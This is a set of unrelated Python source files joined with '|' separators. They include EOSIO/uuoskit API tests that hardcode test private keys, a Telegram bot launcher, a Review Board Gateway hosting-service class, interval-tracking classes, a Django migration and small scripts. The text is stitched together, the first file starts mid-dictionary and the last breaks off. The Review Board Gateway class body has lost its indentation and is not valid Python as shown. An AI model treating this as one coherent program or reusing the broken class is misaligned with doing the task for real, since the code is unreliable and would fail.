            'to': 'bob',
            'quantity': '1.0000 UUOS',
            'memo': 'hello,world'
        }
        a = ['eosio.token', 'transfer', args, {'alice': 'active'}]
        r = uuosapi.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
        logger.info(r)
        assert r
        # NOTE(review): this async call is not awaited in a sync test, so
        # `r` may be a coroutine and `assert r` passes trivially — confirm
        r = uuosapi_async.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
        logger.info(r)
        assert r
        args = {
            'from': 'alice',
            'to': 'bob',
            'quantity': '1.0000 UUOS',
            'typo_memo': 'hello,world'
        }
        a = ['eosio.token', 'transfer', args, {'alice': 'active'}]
        with pytest.raises(Exception):
            r = uuosapi.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
        with pytest.raises(Exception):
            r = uuosapi_async.generate_transaction([a], 60, self.info['last_irreversible_block_id'])

    @pytest.mark.asyncio
    async def test_sign_transaction(self):
        """Signing succeeds for a valid transaction and raises for a
        malformed expiration timestamp."""
        trx = '{"expiration":"2021-04-13T04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
        priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
        r = uuosapi.sign_transaction(trx, priv_key, self.info['chain_id'])
        logger.info(r)
        r = uuosapi_async.sign_transaction(trx, priv_key, self.info['chain_id'])
        trx = '{"expiration":"2021-04-13t04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
        priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
        with pytest.raises(ChainException):
            r = uuosapi.sign_transaction(trx, priv_key, self.info['chain_id'])
            logger.info(r)
        # NOTE(review): not awaited — if sign_transaction is a coroutine
        # function the exception would never be raised here; confirm
        with pytest.raises(ChainException):
            uuosapi_async.sign_transaction(trx, priv_key, self.info['chain_id'])

    @pytest.mark.asyncio
    async def test_pack_transaction(self):
        """Pack a JSON transaction with and without compression via both
        the sync and async APIs."""
        trx = '{"expiration":"2021-04-13T04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
        r = uuosapi.pack_transaction(trx, True)
        logger.info(r)
        assert r
        r = uuosapi.pack_transaction(trx, False)
        logger.info(r)
        assert r
        r = uuosapi_async.pack_transaction(trx, True)
        logger.info(r)
        assert r
        r = uuosapi_async.pack_transaction(trx, False)
        logger.info(r)
        assert r

    @pytest.mark.asyncio
    async def test_basic(self):
        """Public key derivation and key creation."""
        priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
        pub = uuosapi.get_public_key(priv_key)
        logger.info(pub)
        assert pub == uuosapi.get_public_key_prefix() + '8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr'
        key = uuosapi.create_key()
        logger.info(key)
        assert key

    @pytest.mark.asyncio
    async def test_get_table_rows(self):
        """Query token stat and account tables via both APIs."""
        symbol = uuosapi.string_to_symbol(4, 'EOS')
        # The upper bits of a symbol hold its name code
        symbol_code = symbol >> 8
        symbol_code = uuosapi.n2s(symbol_code)
        r = uuosapi.get_table_rows(True, 'eosio.token', symbol_code, 'stat', '', '', 10)
        logger.info(r)
        assert r['rows']
        r = uuosapi.get_table_rows(True, 'eosio.token', 'helloworld11', 'accounts', '', '', 10)
        logger.info(r)
        assert r['rows']
        r = await uuosapi_async.get_table_rows(True, 'eosio.token', symbol_code, 'stat', '', '', 10)
        logger.info(r)
        assert r['rows']
        r = await uuosapi_async.get_table_rows(True, 'eosio.token', 'helloworld11', 'accounts', '', '', 10)
        logger.info(r)
        assert r['rows']

    @pytest.mark.asyncio
    async def test_get_account(self):
        """Account lookup: existing, missing and invalid names."""
        a = uuosapi.get_account('learnfortest')
        assert a
        logger.info(a)
        a = await uuosapi_async.get_account('learnfortest')
        assert a
        logger.info(a)
        logger.info('++++++++%s', uuosapi.s2n('notexists.a'))
        a = uuosapi.get_account('notexists')
        assert not a
        a = await uuosapi_async.get_account('notexists')
        assert not a
        # An account name with invalid characters raises rather than
        # returning None
        with pytest.raises(ChainException):
            a = await uuosapi_async.get_account('notexists...')
            assert not a
            logger.info(a)

    def test_chain_exception(self):
        """ChainException exposes parsed JSON only for JSON-like args."""
        try:
            raise ChainException('oops!')
        except ChainException as e:
            assert not e.json
        try:
            raise ChainException('{"a":1}')
        except ChainException as e:
            assert e.json
        try:
            raise ChainException({"a":1})
        except ChainException as e:
            assert e.json

    def test_deploy_python_code_sync(self):
        """Deploy a python contract and check its console output (sync)."""
        uuosapi.set_node('http://127.0.0.1:9000')
        code = '''
import chain
def apply(a, b, c):
    data = chain.read_action_data()
    print(data)
'''
        account = 'helloworld11'
        config.python_contract = account
        code = uuosapi.mp_compile(account, code)
        uuosapi.deploy_python_contract(account, code, b'')
        r = uuosapi.push_action(account, 'sayhello', b'hellooo,world', {account:'active'})
        console = r['processed']['action_traces'][0]['console']
        logger.info(console)
        assert console == "b'hellooo,world'\r\n"
        r = uuosapi.push_action(account, 'sayhello', b'goodbye,world', {account:'active'})
        console = r['processed']['action_traces'][0]['console']
        logger.info(console)
        assert console == "b'goodbye,world'\r\n"

    @pytest.mark.asyncio
    async def test_deploy_python_code_async(self):
        """Deploy a python contract and check its console output (async)."""
        uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')
        code = '''
import chain
def apply(a, b, c):
    data = chain.read_action_data()
    print(data)
    return
'''
        account = 'helloworld11'
        code = uuosapi_async.mp_compile(account, code)
        async def run_code(code):
            await uuosapi_async.deploy_python_contract(account, code, b'')
            r = await uuosapi_async.push_action(account, 'sayhello', b'hellooo,world', {account:'active'})
            console = r['processed']['action_traces'][0]['console']
            assert console == "b'hellooo,world'\r\n"
            r = await uuosapi_async.push_action(account, 'sayhello', b'goodbye,world', {account:'active'})
            console = r['processed']['action_traces'][0]['console']
            assert console == "b'goodbye,world'\r\n"
        await run_code(code)

    @pytest.mark.asyncio
    async def test_pack_unpack_args(self):
        """Round-trip action argument packing and unpacking."""
        from uuoskit import ABI
        args = {
            'from': 'test1',
            'to': 'test2',
            'quantity': '0.0100 EOS',
            'memo': 'hello'
        }
        r = ABI.pack_action_args('eosio.token', 'transfer', json.dumps(args))
        logger.info(r)
        r = uuosapi.pack_args('eosio.token', 'transfer', args)
        assert r
        logger.info(r)
        r = uuosapi.pack_args('eosio.token', 'transfer', json.dumps(args))
        assert r
        r = uuosapi.unpack_args('eosio.token', 'transfer', r)
        logger.info(r)
        # TODO(review): this early return makes the failure-case checks
        # below unreachable — re-enable once unpack_args error handling
        # for invalid inputs is confirmed
        return
        with pytest.raises(Exception):
            r = uuosapi.unpack_args('eosio.token', 'transfer', {'a':1})
        with pytest.raises(Exception):
            r = uuosapi.unpack_args('eosio.token', 'transfer', json.dumps({'a':1}))
        with pytest.raises(Exception):
            r = uuosapi.unpack_args('eosio.token', 'transfer', b'hello')
        with pytest.raises(Exception):
            r = uuosapi.unpack_args('eosio.token', 'transfer', 'aabb')

    def test_get_required_keys(self):
        """get_required_keys finds a wallet key that can sign a transfer."""
        args = {
            'from': 'helloworld11',
            'to': 'helloworld12',
            'quantity': '0.0100 EOS',
            'memo': 'hello'
        }
        act = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
        chain_info = uuosapi.get_info()
        reference_block_id = chain_info['head_block_id']
        trx = uuosapi.generate_transaction([act], 60, reference_block_id)
        keys = uuosapi.get_required_keys(trx, wallet.get_public_keys())
        assert keys
        chain_id = chain_info['chain_id']
        trx = wallet.sign_transaction(trx, keys, chain_id, json=True)
        assert trx['signatures']
        # logger.info(trx)

    def test_push_action(self):
        r = uuosapi.push_action('hello', 'sayhello', b'hello')
        print(r)

    def test_push_actions(self):
        """Push multiple actions; bad contract name raises with a
        descriptive error; compressed push succeeds."""
        args = {
            'from': 'helloworld11',
            'to': 'helloworld12',
            'quantity': '0.0100 EOS',
            'memo': 'hello'
        }
        a1 = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
        args = {
            'from': 'helloworld12',
            'to': 'helloworld11',
            'quantity': '0.0100 EOS',
            'memo': 'hello'
        }
        a2 = ['eosio.token', 'transfer', args, {'helloworld12': 'active'}]
        balance1 = uuosapi.get_balance('helloworld11')
        r = uuosapi.push_actions([a1, a2])
        balance2 = uuosapi.get_balance('helloworld11')
        logger.info('+++++%s, %s\n', balance1, balance2)
        try:
            uuosapi.push_action('token', 'transfer', args, {'helloworld11': 'active'})
        except Exception as e:
            assert e.args[0] == '[error] in main.transaction_add_action_[/Users/newworld/dev/uuoskit/src/uuoskit/lib.go:150] abi struct not found for token::transfer'
        # test for compressed transaction
        uuosapi.push_action('eosio.token', 'transfer', args, {'helloworld12': 'active'}, compress=True)

    def test_push_transactions(self):
        """Push two independent transactions in one call."""
        test_account1 = 'helloworld11'
        aa = []
        args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.1000 {config.main_token}', 'memo':'hello,world'}
        a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
        aa.append(a)
        args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.2000 {config.main_token}', 'memo':'hello,world'}
        a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
        aa.append(a)
        bb = []
        args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.1000 {config.main_token}', 'memo':'hello,world'}
        a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
        bb.append(a)
        args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.2000 {config.main_token}', 'memo':'hello,world'}
        a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
        bb.append(a)
        uuosapi.push_transactions([aa, bb])

    def test_pack_tx(self):
        """A raw transaction dict round-trips through Transaction.from_json."""
        tx = {"expiration":"1980-01-01T00:01:00","ref_block_num":8,"ref_block_prefix":584400311,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"helloworld11","permission":"active"}],"data":"10428a97721aa36a0000000000ea3055e80300000000000004454f53000000000b68656c6c6f2c776f726c64"},{"account":"eosio.token","name":"transfer","authorization":[{"actor":"helloworld11","permission":"active"}],"data":"10428a97721aa36a0000000000ea3055d00700000000000004454f53000000000b68656c6c6f2c776f726c64"}],"transaction_extensions":[]}
        tx = json.dumps(tx)
        from uuoskit import transaction
        t = transaction.Transaction()
        t.from_json(tx)

    def test_crypto(self):
        key_pair = uuosapi.create_key()
        logger.info(key_pair)

    def gen_tx(self):
        """Helper: build an unsigned transfer transaction."""
        args = {
            'from': 'helloworld11',
            'to': 'eosio',
            'quantity': '0.0100 EOS',
            'memo': 'hello'
        }
        action = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
        chain_info = uuosapi.get_info()
        chain_id = chain_info['chain_id']
        reference_block_id = chain_info['head_block_id']
        tx = uuosapi.generate_transaction([action], 60, reference_block_id, chain_id)
        return tx

    def test_push_tx(self):
        """Sign with the wallet and push a generated transaction."""
        tx = self.gen_tx()
        public_keys = ['EOS7sPDxfw5yx5SZgQcVb57zS1XeSWLNpQKhaGjjy2qe61BrAQ49o',]
        info = uuosapi.get_info()
        # account_info = uuosapi.get_account('helloworld11')
        # logger.info(account_info)
        signed_tx = wallet.sign_transaction(tx, public_keys, info['chain_id'])
        logger.info(signed_tx)
        r = uuosapi.push_transaction(signed_tx)
        logger.info('+++++++++elapsed:%s', r['processed']['elapsed'])

    def test_gen_tx(self):
        tx = self.gen_tx()
        logger.info(tx)
        assert tx

    def test_sign_tx(self):
        """Sign a transaction object directly with a public key."""
        from uuoskit.transaction import Transaction
        tx = self.gen_tx()
        logger.info(tx)
        t = Transaction.from_json(tx)
        pub_key = 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
        sign = t.sign(pub_key)
        logger.info(sign)
        logger.info(t.pack())

    def test_unpack_tx(self):
        """Pack a signed transaction and unpack it again."""
        from uuoskit.transaction import Transaction
        tx = self.gen_tx()
        logger.info(tx)
        t = Transaction.from_json(tx)
        pub_key = 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
        sign = t.sign(pub_key)
        logger.info(sign)
        tx = t.pack()
        logger.info(tx)
        tx = Transaction.unpack(tx['packed_trx'])
        logger.info(tx)

    def test_wallet_sign(self):
        from uuoskit.transaction import Transaction
        from uuoskit import wallet
        tx = self.gen_tx()
        pubs = ['EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV']
        tx = wallet.sign_transaction(tx, pubs, self.chain_id)
        logger.info(tx)

    def test_get_public_key(self):
        """Public key derivation in both EOS and canonical formats."""
        priv = '5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3'
        pub_eos = uuosapi.get_public_key(priv)
        pub_common = uuosapi.get_public_key(priv, False)
        assert pub_eos == 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
        assert pub_common == 'PUB_K1_6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5BoDq63'
|
from telegram.ext import Updater
from .guest_handlers import guest_conv_handler
from .admin_handlers import admin_conv_handler
import logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
def bot_main(TOKEN: str):
    """Build the Telegram updater, register the guest and admin
    conversation handlers, and poll for updates until interrupted."""
    updater = Updater(token=TOKEN, use_context=True)
    for handler in (guest_conv_handler, admin_conv_handler):
        updater.dispatcher.add_handler(handler)
    updater.start_polling()
    # Block the main thread until a stop signal is received
    updater.idle()
|
from __future__ import unicode_literals
import json
import logging
from django import forms
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.translation import ugettext_lazy as _, ugettext
from reviewboard.hostingsvcs.errors import (AuthorizationError,
HostingServiceError)
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.core import Branch, Commit
from reviewboard.scmtools.errors import FileNotFoundError, SCMError
class ReviewBoardGatewayForm(HostingServiceForm):
    """Hosting service form for Review Board Gateway.

    Provide an additional field on top of the base hosting service form to
    allow specification of the repository name.
    """

    # Must match the repository name in the rb-gateway configuration file
    rbgateway_repo_name = forms.CharField(
        label=_('Repository name'),
        max_length=128,
        required=True,
        widget=forms.TextInput(attrs={'size': '60'}),
        help_text=_('The name of the repository. This is the name '
                    'specified in the configuration file for rb-gateway.'))
class ReviewBoardGateway(HostingService):
"""Hosting service support for Review Board Gateway.
Review Board Gateway is a lightweight self-installed source hosting service
that currently supports Git repositories.
"""
name = 'Review Board Gateway'
form = ReviewBoardGatewayForm
self_hosted = True
needs_authorization = True
supports_repositories = True
supports_post_commit = True
supported_scmtools = ['Git']
repository_fields = {
'Git': {
'path': '%(hosting_url)s/repos/%(rbgateway_repo_name)s/path'
}
}
def check_repository(self, path, *args, **kwargs):
"""Check whether the repository exists."""
self._api_get(path)
def authorize(self, username, password, hosting_url, *args, **kwargs):
"""Authorize the Review Board Gateway repository.
Review Board Gateway uses HTTP Basic Auth, so this will store the
provided password, encrypted, for use in later API requests.
Similar to GitLab's API, Review Board Gateway will return a private
token on session authentication.
"""
try:
data, headers = self.client.json_post(
url=hosting_url + '/session',
username=username,
password=password)
except HTTPError as e:
if e.code == 404:
raise HostingServiceError(
ugettext('A Review Board Gateway server was not found at '
'the provided URL.'))
elif e.code == 401:
raise AuthorizationError(
ugettext('The username or password is incorrect.'))
else:
logging.warning('Failed authorization at %s: %s',
hosting_url + '/session', e, exc_info=1)
raise
self.account.data['private_token'] = \
encrypt_password(data['private_token'])
self.account.save()
def is_authorized(self):
"""Determine if the account has supported authorization tokens.
This will check if we have previously stored a private token for the
account. It does not validate that the token still works.
"""
return 'private_token' in self.account.data
def get_file(self, repository, path, revision, base_commit_id, *args,
**kwargs):
"""Get a file from ReviewBoardGateway.
This will perform an API request to fetch the contents of a file.
"""
url = self._get_file_url(repository, revision, base_commit_id, path)
try:
data, is_new = self._api_get(url)
return data
except (HTTPError, URLError) as e:
if e.code == 404:
raise FileNotFoundError(path, revision)
else:
logging.warning('Failed to get file from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_file_exists(self, repository, path, revision, base_commit_id,
*args, **kwargs):
"""Check whether a file exists in ReviewBoardGateway.
This will perform an API request to fetch the meta_data of a file.
"""
url = self._get_file_url(repository, revision, base_commit_id, path)
try:
self._api_head(url)
return True
except (HTTPError, URLError) as e:
if e.code == 404:
return False
else:
logging.warning('Failed to get file exists from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_branches(self, repository):
url = ('%s/repos/%s/branches' %
(self.account.hosting_url,
repository.extra_data['rbgateway_repo_name']))
try:
data, headers = self._api_get(url)
branches = json.loads(data)
results = []
for branch in branches:
results.append(Branch(id=branch['name'],
commit=branch['id'],
default=(branch['name'] == 'master')))
return results
except Exception as e:
logging.warning('Failed to get branches from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_commits(self, repository, branch=None, start=None):
if start is not None:
url = ('%s/repos/%s/branches/%s/commits?start=%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
branch,
start))
else:
url = ('%s/repos/%s/branches/%s/commits'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
branch))
try:
data, headers = self._api_get(url)
commits = json.loads(data)
results = []
for commit in commits:
results.append(Commit(commit['author'],
commit['id'],
commit['date'],
commit['message'],
commit['parent_id']))
return results
except Exception as e:
logging.warning('Failed to fetch commits from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_change(self, repository, revision):
url = ('%s/repos/%s/commits/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
revision))
try:
data, headers = self._api_get(url)
commit = json.loads(data)
return Commit(commit['author'],
commit['id'],
commit['date'],
commit['message'],
commit['parent_id'],
diff=commit['diff'])
except Exception as e:
logging.warning('Failed to fetch commit change from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def _get_file_url(self, repository, revision, base_commit_id=None,
path=None):
"""Get the URL for accessing the contents of a file.
A revision or a base commit id, path pair is expected to be provided.
By default, this will return the URL based on the revision, if both
are provided.
"""
if revision:
return ('%s/repos/%s/file/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
revision))
else:
return ('%s/repos/%s/commits/%s/path/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
base_commit_id,
path))
def _api_get(self, url):
"""Make a GET request to the Review Board Gateway API.
Delegate to the client's http_get function but first add a
PRIVATE-TOKEN in the header for authentication.
"""
try:
data, headers = self.client.http_get(
url,
headers={
'PRIVATE-TOKEN': self._get_private_token(),
})
return data, headers
except HTTPError as e:
if e.code == 401:
raise AuthorizationError(
ugettext('The login or password is incorrect.'))
elif e.code == 404:
raise
else:
logging.warning('Failed to execute a GET request at %s: %s',
url, e, exc_info=1)
raise
def _api_head(self, url):
"""Make a HEAD request to the Review Board Gateway API.
Delegate to the client's http_request function using the method
HEAD but first add a PRIVATE-TOKEN in the header for authentication.
"""
try:
data, headers = self.client.http_request(
url,
headers={
'PRIVATE-TOKEN': self._get_private_token(),
},
method='HEAD')
return headers
except HTTPError as e:
if e.code == 401:
raise AuthorizationError(
ugettext('The login or password is incorrect.'))
elif e.code == 404:
raise
else:
logging.warning('Failed to execute a HEAD request at %s: %s',
url, e, exc_info=1)
raise
    def _get_private_token(self):
        """Return the private token used for authentication.

        The token is stored encrypted in the hosting account's data and is
        decrypted on every call.
        """
        return decrypt_password(self.account.data['private_token'])
|
from .parser import get_args
from .data import Tawqeetex
def console_start():
    """Read the command-line arguments and generate the prayer-time PDF
    schedule, reporting success on stdout."""
    schedule = Tawqeetex(*get_args())
    schedule.create_schedule()
    print("The prayer time schedule has been generated successfully")
|
from __future__ import print_function
import math
from math import isnan, isinf
from datetime import datetime
__all__ = ['TimeRange', 'Runs']
class TimeRange(object):
    """A span of time with an optional peak value and a set of string tags.

    Times and durations share whatever unit the caller uses; ``__repr__``
    assumes milliseconds when pretty-printing.
    """

    __slots__ = ('start', 'duration', 'peak', 'tags')

    def __init__(self, start, duration, peak=None, tags=None):
        self.start = start          # beginning of the range
        self.duration = duration    # length of the range
        self.peak = peak            # optional peak value seen in the range
        self.tags = tags            # optional set of string tags (or None)

    def copy(self):
        """Return an independent copy of this range.

        Bug fix: previously the tags set object was shared between the
        original and the copy, so tagging one silently mutated the other.
        """
        tags = set(self.tags) if self.tags is not None else None
        return TimeRange(self.start, self.duration, self.peak, tags)

    def intersects_range(self, other):
        """Return True if this range overlaps (or exactly touches) other."""
        min_end = min(self.end, other.end)
        max_start = max(self.start, other.start)
        return max_start <= min_end

    def add_tag(self, tag):
        """Add a single tag, creating the tag set lazily.

        Robustness fix: tags defaults to None, so initialize the set here
        instead of raising AttributeError on the first tag.
        """
        if self.tags is None:
            self.tags = set()
        self.tags.add(tag)

    def add_tags(self, tags):
        """Add several tags at once, creating the tag set lazily."""
        if self.tags is None:
            self.tags = set()
        self.tags.update(tags)

    @property
    def end(self):
        """End of the range (start + duration)."""
        return self.start + self.duration

    @end.setter
    def end(self, value):
        # Setting the end adjusts the duration while keeping start fixed.
        self.duration = value - self.start

    def to_dict(self):
        """Serialize to a plain dict (tags become a list for JSON safety)."""
        return { 'start': self.start,
                 'duration': self.duration,
                 'peak': self.peak,
                 'tags': list(self.tags) if self.tags else [] }

    @classmethod
    def from_dict(cls, d):
        """Rebuild a TimeRange from ``to_dict`` output.

        'peak' and 'tags' may be absent; they default to None / empty set.
        """
        return cls(d['start'], d['duration'], d.get('peak'),
                   set(d.get('tags', [])))

    def __repr__(self):
        peak_str = ''
        if self.peak is not None:
            peak_str = '; peak {:.2f}'.format(self.peak)
        tags_str = ''
        if self.tags is not None and len(self.tags) > 0:
            tags_str = '; tags ({})'.format(', '.join(self.tags))
        return '<TimeRange {:.2f} - {:.2f}; duration {:.2f}s{}{}>'.format(
            self.start / 1000., self.end / 1000., self.duration / 1000.,
            peak_str, tags_str)
class Runs(object):
    """Accumulates TimeRange "runs" from a stream of run/gap events.

    A completed run is kept only if it lasts at least
    ``minimum_run_duration``; gaps shorter than ``maximum_gap_between_runs``
    are absorbed into the current run instead of terminating it.
    """

    def __init__(self, minimum_run_duration, maximum_gap_between_runs):
        self._minimum_run_duration = minimum_run_duration
        self._maximum_gap_between_runs = maximum_gap_between_runs
        self.runs = []              # completed, accepted runs
        self._current_run = None    # run currently being extended

    def copy(self):
        """Return a deep copy (runs and the in-progress run are copied)."""
        copy = Runs(self._minimum_run_duration, self._maximum_gap_between_runs)
        if self._current_run:
            copy._current_run = self._current_run.copy()
        copy.runs = [run.copy() for run in self.runs]
        return copy

    def add_run(self, start, duration, peak):
        """Extend the current run (or start one) with a new active segment."""
        if self._current_run is None:
            self._current_run = TimeRange(start, duration, peak)
        else:
            # Stretch the current run so it covers the new segment's end.
            new_duration = (start - self._current_run.start) + duration
            new_peak = max(self._current_run.peak, peak)
            self._current_run.duration = new_duration
            self._current_run.peak = new_peak

    def add_gap(self, start, duration):
        """Register an inactive segment; ends the run if the gap is too big."""
        if self._current_run is not None:
            # Are we still close enough to the end of the current run that
            # we can overlook this gap?
            if start - self._current_run.end < self._maximum_gap_between_runs:
                return
            self.end_current_run()

    def end_current_run(self):
        # A gap terminates the current run. If it's long enough, add it to
        # the runs array.
        if (self._current_run is not None
                and self._current_run.duration >= self._minimum_run_duration):
            self.runs.append(self._current_run)
        self._current_run = None

    def time_range_intersects_a_run(self, time_range):
        """Return True if ``time_range`` overlaps any completed run.

        Assumes self.runs is sorted by start (normalize() guarantees this).
        """
        for run in self.runs:
            if run.start > time_range.end:
                # We've gone past all applicable ranges.
                return False
            if time_range.intersects_range(run):
                return True
        return False

    def time_is_in_a_run(self, time):
        """Return True if ``time`` falls inside any completed run.

        Bug fix: the early exit now triggers only once ``time`` precedes the
        run's start; previously a time past the FIRST run's end returned
        False even when a later run contained it.
        Assumes self.runs is sorted by start (normalize() guarantees this).
        """
        for run in self.runs:
            if time < run.start:
                # Runs are sorted, so no later run can start early enough.
                return False
            if time < run.end:
                return True
        return False

    def normalize(self):
        """Sort runs by start time and merge overlapping runs."""
        def merge_sorted(runs):
            if len(runs) <= 1:
                return runs
            run = runs[0]
            next_run = runs[1]
            if run.intersects_range(next_run):
                # Bug fix: extend to the furthest end instead of summing the
                # durations, which double-counted the overlapping portion.
                run.end = max(run.end, next_run.end)
                if run.peak is None:
                    run.peak = next_run.peak
                elif next_run.peak is not None:
                    run.peak = max(run.peak, next_run.peak)
                # Merge tags from the absorbed run (was a TODO).
                if next_run.tags:
                    if run.tags is None:
                        run.tags = set()
                    run.tags.update(next_run.tags)
                return merge_sorted([run] + runs[2:])
            return [run] + merge_sorted(runs[1:])

        sorted_runs = sorted(self.runs, key=lambda r: r.start)
        self.runs = merge_sorted(sorted_runs)

    def pad_runs(self, pre_padding, post_padding, max_duration):
        """Widen every run by the paddings, clamped to [0, max_duration].

        Bug fix: the padded end is computed before the start moves, so a
        start clamped at 0 no longer leaks its leftover pre-padding into
        the end of the run.
        """
        for run in self.runs:
            new_end = min(run.end + post_padding, max_duration)
            run.start = max(0, run.start - pre_padding)
            run.duration = new_end - run.start
        self.normalize()

    def to_dict(self):
        """Serialize this object (including any in-progress run)."""
        d = { 'minimum_run_duration': self._minimum_run_duration,
              'maximum_gap_between_runs': self._maximum_gap_between_runs,
              '_current_run': None,
              'runs': [r.to_dict() for r in self.runs] }
        if self._current_run is not None:
            d['_current_run'] = self._current_run.to_dict()
        return d

    @classmethod
    def from_dict(cls, d):
        """Rebuild a Runs object from ``to_dict`` output."""
        runs = cls(d['minimum_run_duration'], d['maximum_gap_between_runs'])
        if d['_current_run'] is not None:
            runs._current_run = TimeRange.from_dict(d['_current_run'])
        # Bug fix: materialize the list; under Python 3 ``map`` returns a
        # one-shot iterator, which broke len()/indexing on self.runs.
        runs.runs = [TimeRange.from_dict(rd) for rd in d['runs']]
        return runs

    def __repr__(self):
        if len(self.runs) == 0: return '<Runs (empty)>'
        runs_reprs = '\n '.join(map(repr, self.runs))
        total_duration_s = sum([run.duration for run in self.runs]) / 1000.
        duration_s = total_duration_s % 60
        duration_m = int(total_duration_s / 60)
        return '<Runs ({} runs; total duration {}:{:05.2f})>:\n {}'.format(len(self.runs), duration_m, duration_s, runs_reprs)
|
# Smoke test for the project's NeoLogger wrapper: obtain a named logger and
# emit one message at each of the warning and error levels.
from AllNeo_Code.Helper.logger import NeoLogger as NL
Logger = NL.NeoLogger.getLogger("TestLog")
Logger.warning("Test Warning")
Logger.error("Test Error")
from django.db import models, migrations
def update_last_modify_timestamp(apps, schema_editor):
    """Backfill Chat.last_modify_timestamp from each chat's newest message.

    Chats that already have a timestamp, or that have no messages at all,
    are left untouched.
    """
    Chat = apps.get_model('chat', 'Chat')
    for chat in Chat.objects.all():
        if chat.last_modify_timestamp:
            continue
        newest = chat.message_set.all().order_by('-timestamp').first()
        if not newest:
            continue
        chat.last_modify_timestamp = newest.timestamp
        chat.save()
class Migration(migrations.Migration):
    """Data migration: populate Chat.last_modify_timestamp for existing rows."""

    dependencies = [
        ('chat', '0010_auto_20170613_0632'),
    ]

    operations = [
        # The reverse function is a no-op so the migration can be unapplied.
        migrations.RunPython(update_last_modify_timestamp, lambda apps, se: None),
    ]
|
import sys

# Emit "start end" pairs for a sliding window walked across [0, limit].
#   sys.argv[1]: largest start value to emit (inclusive)
#   sys.argv[2]: overlap carried over between consecutive windows
#   sys.argv[3]: window length
# NOTE(review): if argv[2] >= argv[3] the start never advances and this loops
# forever -- presumably the caller guarantees overlap < length; confirm.
limit = int(sys.argv[1])
overlap = int(sys.argv[2])
length = int(sys.argv[3])

# Improvement: the int(sys.argv[...]) conversions were previously re-done on
# every loop iteration; they are loop-invariant, so parse them once.
start = 0
end = length
while start <= limit:
    print(str(start) + " " + str(end))
    start = end - overlap
    end = start + length
|
import asyncio
import sys
import time
import weakref
from random import random
import pytest
try:
import cloudpickle # noqa: F401
skip_cloudpickle_test = False
except ImportError:
skip_cloudpickle_test = True
from hybrid_pool_executor.constants import ACT_EXCEPTION, ACT_RESTART
from hybrid_pool_executor.workers.process.worker import (
Action,
ProcessManager,
ProcessManagerSpec,
ProcessTask,
ProcessWorker,
ProcessWorkerSpec,
)
def simple_task():
    """Trivial synchronous task fixture; always succeeds with "done"."""
    return "done"
def simple_error_task():
